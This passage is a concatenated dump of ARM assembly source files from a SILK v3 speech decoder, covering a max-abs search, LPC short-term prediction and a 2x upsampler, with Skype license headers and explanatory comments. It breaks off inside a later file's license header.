/* Peel the first (unaligned) element, then run word loads as above. */
L(3)
ands r2, r1, #0x1
bne LR(5, f)
ldrsh val_vec, [ptr_vec], #2
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
ldr val_vec, [ptr_vec], #4
sub len, len, #4
L(4)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(4, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #6 /*address*/
smulbb val1_max, val_vec, val_vec
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2 /*address*/
b LR(9, f)
/*Odd number of iterations+Oddly aligned*/
L(5)
ldrsh val_vec, [ptr_vec], #2
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
ldr val_vec, [ptr_vec], #4
sub len, len, #3
L(6)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(6, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4 /*address*/
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
b LR(9, f)
/*Less than 6 iterations*/
L(7)
ldrsh val_vec, [ptr_vec], #2
sub len, len, #1
L(8)
smulbb val1_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4
subs len, len, #1
bgt LR(8, b)
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
/* Finish: reload winner, take |x|, clamp to 0x7FFF, return in r0. */
L(9)
ldrsh val_return, [val_ind]
mvn const_int16_MAX, #0x80000000 /* 0x7FFFFFFF ... */
mov const_int16_MAX, const_int16_MAX, asr #16 /* ... >> 16 = 0x7FFF */
cmp val_return, #0
rsblt val_return, val_return, #0 /* absolute value */
cmp val_return, const_int16_MAX
movge val_return, const_int16_MAX /* clamp -32768 -> 32767 */
ldmia sp!, {r4-r6, fp, ip, pc}
#elif EMBEDDED_ARM>=4
/* ARMv4 fallback for SKP_Silk_int16_array_maxabs (no DSP multiplies):
 * two samples are loaded per iteration with ldrsh and squared with the
 * plain 32-bit mul.  As in the ARMv5 variant, the running maximum
 * SQUARE and the winning element's ADDRESS are tracked, and the result
 * is |vec[ind]| clamped to 0x7FFF.
 * NOTE(review): this variant assumes len >= 2 and relies on the
 * len == -1 check below to drop the phantom second element when len is
 * odd -- confirm callers never pass len < 2. */
VARDEF ptr_vec, r0
VARDEF val1_vec, r2 /* even-indexed sample */
VARDEF val2_vec, r7 /* odd-indexed sample */
VARDEF len, r1
VARDEF val1_max, r3
VARDEF val2_max, r8
VARDEF val_lvl, r5 /* running maximum square, starts at -1 */
VARDEF val_ind, r6 /* address of current maximum element */
VARDEF val_return, r0
VARDEF const_int16_MAX, r5
.globl SYM(SKP_Silk_int16_array_maxabs)
SYM(SKP_Silk_int16_array_maxabs):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
mvn val_lvl, #0 /*r5 = -1(max)*/
ldrsh val1_vec, [ptr_vec], #2
ldrsh val2_vec, [ptr_vec], #2
sub len, len, #2
L(0)
mul val1_max, val1_vec, val1_vec
mul val2_max, val2_vec, val2_vec
ldrsh val1_vec, [ptr_vec], #2
ldrsh val2_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #8
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(0, b)
/* Epilogue: last pair; skip the second slot when len was odd. */
mul val1_max, val1_vec, val1_vec
mul val2_max, val2_vec, val2_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4
cmn len, #1 /*r1?=-1*/
beq LR(1, f) /* odd len: second sample is past the array */
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
/* Finish: reload winner, take |x|, clamp to 0x7FFF, return in r0. */
L(1)
ldrsh val_return, [val_ind]
mvn const_int16_MAX, #0x80000000 /* 0x7FFFFFFF ... */
mov const_int16_MAX, const_int16_MAX, asr #16 /* ... >> 16 = 0x7FFF */
cmp val_return, #0
rsblt val_return, val_return, #0 /* absolute value */
cmp val_return, const_int16_MAX
movge val_return, const_int16_MAX /* clamp -32768 -> 32767 */
ldmia sp!, {r4-r8, fp, ip, pc}
#endif
END
#endif
|
open-vela/external_silk-v3-decoder | 10,005 | silk/src/SKP_Silk_decode_core_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#include "SKP_Silk_AsmPreproc.h"
#define MAX_LPC_ORDER 16
#define MAX_LPC_ORDER_INT32_OFFSET 64
#if EMBEDDED_ARM >= 5
/*
 * SKP_Silk_decode_short_term_prediction() -- hand-scheduled ARM (EMBEDDED_ARM >= 5).
 *
 * Short-term LPC synthesis loop of the SILK decoder.  Per output sample it
 * computes, in fixed point:
 *
 *     LPC_pred_Q10 = sum_{i=0..LPC_order-1} (sLPC_Q14[k-i-1] * A_Q12[i]) >> 16
 *     vec_Q10[k]   = pres_Q10[k] + LPC_pred_Q10
 *     sLPC_Q14[k]  = vec_Q10[k] << 4            // Q10 -> Q14 state update
 *
 * Arguments (AAPCS):
 *     r0       = vec_Q10   output pointer (Q10)
 *     r1       = pres_Q10  residual/excitation input pointer (Q10)
 *     r2       = sLPC_Q14  LPC state buffer (Q14); MAX_LPC_ORDER history
 *                          words precede the samples written here
 *     r3       = A_Q12     LPC coefficients (Q12 int16, two per 32-bit word)
 *     [sp,#40] = LPC_order, [sp,#44] = subfr_length (loop count)
 *
 * Four specialized inner loops are selected on entry, keyed on whether
 * A_Q12 is 32-bit aligned (SMLAWB/SMLAWT pick the even/odd coefficient from
 * each loaded word) and on LPC_order:
 *     L(0) word-aligned,  order 16      L(1) word-aligned,  order != 16
 *     L(3) half-aligned,  order 16      L(4) half-aligned,  order != 16
 * NOTE(review): the "LPC_order == 10" loops read exactly 10 taps; SILK only
 * uses orders 10 and 16 -- confirm no other order can reach this routine.
 */
/* Register aliases (VARDEF from SKP_Silk_AsmPreproc.h).  Aliases that share
   a physical register (e.g. val1_LPC_Q14/val_pres_Q10 on r5) are live at
   different points of the loop body. */
VARDEF ptr_vec_Q10, r0
VARDEF ptr_pres_Q10, r1
VARDEF ptr_sLPC_Q14, r2
VARDEF ptr_A_Q12_tmp, r3
VARDEF ptr_LPC_Q14, r4
VARDEF val1_LPC_Q14, r5
VARDEF val_pres_Q10, r5
VARDEF val2_LPC_Q14, r6
VARDEF val_vec_Q10, r6
VARDEF val3_LPC_Q14, r8
VARDEF val4_LPC_Q14, sb
VARDEF val1_Atmp, sl
VARDEF val_LPC_Q14, sl
VARDEF val2_Atmp, ip
VARDEF val_subfr_length, _r7
VARDEF val_LPC_order, lr
VARDEF val_LPC_pred_Q10, lr
.globl SYM(SKP_Silk_decode_short_term_prediction)
SYM(SKP_Silk_decode_short_term_prediction):
	stmdb sp!, {r4-r10, fp, ip, lr}
	add fp, sp, #36
.set ptr_LPC_order, 40
.set ptr_subfr_length, 44
	ldr val_LPC_order, [sp, #ptr_LPC_order]
	ldr val_subfr_length, [sp, #ptr_subfr_length]
	ands val1_Atmp, ptr_A_Q12_tmp, #3		// is A_Q12 32-bit aligned?
	add ptr_sLPC_Q14, ptr_sLPC_Q14, #MAX_LPC_ORDER_INT32_OFFSET	// skip 16-word (64-byte) state history
	bne LR(2, f)					// halfword-aligned coefs -> L(3)/L(4)
	cmp val_LPC_order, #16
	bne LR(1, f)
/*LPC_order == 16*/
/* Word-aligned, order-16 loop: coefficient pairs loaded with post-indexed
   ldm/ldr, state walked backwards in pairs with ldmdb from sLPC_Q14[k-1]. */
L(0)
	mov ptr_LPC_Q14, ptr_sLPC_Q14
	ldmia ptr_A_Q12_tmp!, {val1_Atmp, val2_Atmp}
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smulwb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp	// start the 16-tap MAC chain
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldr val2_Atmp, [ptr_A_Q12_tmp], #-28		// last coef pair; rewind A_Q12 for next sample
	smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val_pres_Q10, [ptr_pres_Q10], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	subs val_subfr_length, val_subfr_length, #1
	add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10	// vec = pred + residual
	mov val_LPC_Q14, val_vec_Q10, lsl #4		// Q10 -> Q14 state sample
	str val_vec_Q10, [ptr_vec_Q10], #4
	str val_LPC_Q14, [ptr_sLPC_Q14], #4
	bgt LR(0, b)					// next output sample
	ldmia sp!, {r4-r10, fp, ip, pc}			// restore and return
/*LPC_order == 10*/
/* Word-aligned, order-10 loop: same structure, 10 taps. */
L(1)
	mov ptr_LPC_Q14, ptr_sLPC_Q14
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smulwb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldr val2_Atmp, [ptr_A_Q12_tmp], #-16		// last coef pair; rewind A_Q12 (5 words)
	smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val_pres_Q10, [ptr_pres_Q10], #4
	smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	subs val_subfr_length, val_subfr_length, #1
	add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10	// vec = pred + residual
	mov val_LPC_Q14, val_vec_Q10, lsl #4		// Q10 -> Q14 state sample
	str val_vec_Q10, [ptr_vec_Q10], #4
	str val_LPC_Q14, [ptr_sLPC_Q14], #4
	bgt LR(1, b)
	ldmia sp!, {r4-r10, fp, ip, pc}
/* A_Q12 only halfword-aligned: first coefficient fetched with ldrh, the
   rest as misaligned-compensated word loads. */
L(2)
	cmp val_LPC_order, #16
	bne LR(4, f)
/*LPC_order == 16*/
L(3)
	mov ptr_LPC_Q14, ptr_sLPC_Q14
	ldrh val1_Atmp, [ptr_A_Q12_tmp], #2		// lone leading halfword coef
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smulwb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldrh val1_Atmp, [ptr_A_Q12_tmp], #-30		// last coef; rewind A_Q12 to start
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val_pres_Q10, [ptr_pres_Q10], #4
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	subs val_subfr_length, val_subfr_length, #1
	add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10	// vec = pred + residual
	mov val_LPC_Q14, val_vec_Q10, lsl #4		// Q10 -> Q14 state sample
	str val_vec_Q10, [ptr_vec_Q10], #4
	str val_LPC_Q14, [ptr_sLPC_Q14], #4
	bgt LR(3, b)
	ldmia sp!, {r4-r10, fp, ip, pc}
/*LPC_order == 10*/
L(4)
	mov ptr_LPC_Q14, ptr_sLPC_Q14
	ldrh val2_Atmp, [ptr_A_Q12_tmp], #2		// lone leading halfword coef
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smulwb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val1_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val2_Atmp, [ptr_A_Q12_tmp], #4
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
	smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	ldr val1_Atmp, [ptr_A_Q12_tmp], #-18		// last coef; rewind A_Q12 to start
	smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	ldr val_pres_Q10, [ptr_pres_Q10], #4
	smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
	smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
	subs val_subfr_length, val_subfr_length, #1
	add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10	// vec = pred + residual
	mov val_LPC_Q14, val_vec_Q10, lsl #4		// Q10 -> Q14 state sample
	str val_vec_Q10, [ptr_vec_Q10], #4
	str val_LPC_Q14, [ptr_sLPC_Q14], #4
	bgt LR(4, b)
	ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
|
open-vela/external_silk-v3-decoder | 3,468 | silk/src/SKP_Silk_resampler_up2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
 * SKP_Silk_resampler_up2() -- low-quality 2x upsampler, ARM (EMBEDDED_ARM >= 5).
 *
 * For each int16 input sample, two int16 output samples are produced via two
 * first-order allpass sections (one per output phase) with 32-bit states
 * S[0], S[1]:
 *     in_Q10 = in << 10
 *     yN = in_Q10 - S[N];  xN = yN * coefN (SMULW*, 16x32>>16)
 *     outN = S[N] + xN;    S[N] = in_Q10 + xN
 * followed by rounding (+512, saturating QADD), saturation to int16 and an
 * arithmetic shift down by 10.
 *
 * Arguments:
 *     r0 = S    (int32[2] allpass state, read and written back at exit)
 *     r1 = out  (int16*, receives 2*len samples)
 *     r2 = in   (int16*, len samples; len == 0 is handled -- the loop is
 *                skipped, though note one input halfword is prefetched first)
 *     r3 = len
 *
 * The two Q16-ish allpass coefficients are packed into one register:
 * up2_coefs = 0x1FA68FAF (top halfword 0x1FA6 used by SMULWT for phase 0,
 * bottom halfword 0x8FAF used by SMLAWB for phase 1).  NOTE(review): the
 * phase-1 MAC adds xy1 back in (smlawb ... , xy1), i.e. the bottom
 * coefficient is effectively 1.0 + 0x8FAF/65536 -- presumably because the
 * true coefficient exceeds the 16-bit range; confirm against the C
 * reference SKP_Silk_resampler_up2.c.
 */
#define SKP_Silk_resampler_up2_lq_0 0x1FA6
#define SKP_Silk_resampler_up2_lq_1 0x8FAF
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF up2_coefs, _r7
VARDEF S_0, r6
VARDEF S_1, r8
VARDEF in, sb
VARDEF out0, sl
VARDEF out1, r0			// NOTE: out1 reuses r0; S pointer is spilled to the stack first
.set sp_S, 0
.globl SYM(SKP_Silk_resampler_up2)
SYM(SKP_Silk_resampler_up2):
	stmdb sp!, {r4-r10, fp, ip, lr}
	add fp, sp, #36
	sub sp, sp, #4			// one-word spill slot for the S pointer
	mov up2_coefs, #0x1F000000	// build 0x1FA68FAF in four immediates
	ldrsh in, [r2], #2		// prefetch first input sample
	add up2_coefs, up2_coefs, #0xA60000
	str r0, [sp, #sp_S]		// spill &S (r0 is reused as out1 below)
	add up2_coefs, up2_coefs, #0x8F00
	ldmia r0, {S_0, S_1}
	add up2_coefs, up2_coefs, #0xAF
	mov ip, #512			// rounding constant for the >>10 at the end
	cmp r3, #0
	beq LR(1, f)			// len == 0: nothing to do
L(0)
	mov in, in, lsl #10		// input promoted to Q10 domain
	sub xy0, in, S_0
	sub xy1, in, S_1
	smulwt xy0, xy0, up2_coefs	// phase 0: * top-half coefficient
	smlawb xy1, xy1, up2_coefs, xy1	// phase 1: * (1 + bottom-half coefficient)
	add out0, S_0, xy0
	add out1, S_1, xy1
	add S_0, in, xy0		// allpass state updates
	add S_1, in, xy1
	qadd out0, out0, ip		// saturating round before >>10
	qadd out1, out1, ip
#if EMBEDDED_ARM<6
	/* Manual saturation to int16 range (after >>10) on cores without SSAT. */
	cmp out0, #0x2000000
	movge out0, #0x2000000
	subge out0, out0, #1		// clamp to 0x1FFFFFF (== 32767 << 10 + rounding headroom)
	cmn out0, #0x2000000
	movlt out0, #0x2000000
	cmp out1, #0x2000000
	movge out1, #0x2000000
	subge out1 ,out1, #1
	cmn out1, #0x2000000
	movlt out1, #0x2000000
	mov out0, out0, asr #10
	mov out1, out1, asr #10
#else
	ssat out0, #16, out0, asr #10	// ARMv6+: shift and saturate in one step
	ssat out1, #16, out1, asr #10
#endif
	subs r3, r3, #1
#ifdef _WINRT
	/* WinRT toolchain path: no conditional ldrsh, so branch around it. */
	ble LR(2, f)
	ldrsh in, [r2], #2
	strh out0, [r1], #2
	strh out1, [r1], #2
	b LR(0, b)
L(2)
	strh out0, [r1], #2
	strh out1, [r1], #2
#else
	ldrgtsh in, [r2], #2		// prefetch next input only if more to do
	strh out0, [r1], #2		// emit both output phases
	strh out1, [r1], #2
	bgt LR(0, b)
#endif
	ldr r0, [sp, #sp_S]		// restore &S and write back the state
	stmia r0, {S_0, S_1}
L(1)
	add sp, sp, #4
	ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 9,351 | silk/src/SKP_Silk_resampler_rom_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
